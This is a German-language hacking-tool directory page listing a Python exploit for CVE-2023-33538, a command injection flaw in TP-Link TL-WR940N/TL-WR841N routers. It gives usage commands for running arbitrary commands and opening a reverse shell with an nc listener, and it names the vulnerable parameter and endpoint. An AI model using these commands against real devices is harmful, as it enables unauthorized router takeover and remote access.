Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-33538 — Python Exploit für TP-Link TL-WR940N/TL-WR841N Command Injection Vulnerability | Kitploit
Tools/GitHubGitHub/explxx/cve-2023-33538
IoT-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationDrahtlose SicherheitPenetrationstestsCommand and ControlLernen & Bildung
GitHubexplxx/cve-2023-33538

CVE-2023-33538

Python Exploit für TP-Link TL-WR940N/TL-WR841N Command Injection Vulnerability

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Python-Exploit für TP-Link TL-WR940N/TL-WR841N Command Injection Schwachstelle

Nutzungshinweise

  1. Einfacher Sicherheitscheck:

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
    
  2. Eigenen Befehl ausführen:

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
    
  3. Reverse Shell (zuerst Listener mit nc -lvnp 4444 einrichten):

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
    

Wichtige Hinweise:

  • Diese Skripte dienen ausschließlich Bildungs- und Testzwecken
  • Holen Sie immer die entsprechende Genehmigung ein, bevor Sie ein System testen
  • Der Reboot-Befehl wird standardmäßig verwendet, da er nicht destruktiv und leicht überprüfbar ist
  • Die Reverse Shell funktioniert möglicherweise nicht auf allen Firmware-Versionen, da sie von verfügbaren Binärdateien abhängt
  • Einige Firmware-Versionen erfordern einen zufälligen Pfad in der URL, den das Skript automatisch zu erkennen versucht

Die Schwachstelle besteht aufgrund unzureichender Eingabebereinigung im ssid1-Parameter des Endpunkts /userRpm/WlanNetworkRpm.htm, was durch speziell gestaltete Anfragen eine Befehlsinjektion ermöglicht.

Tool herunterladen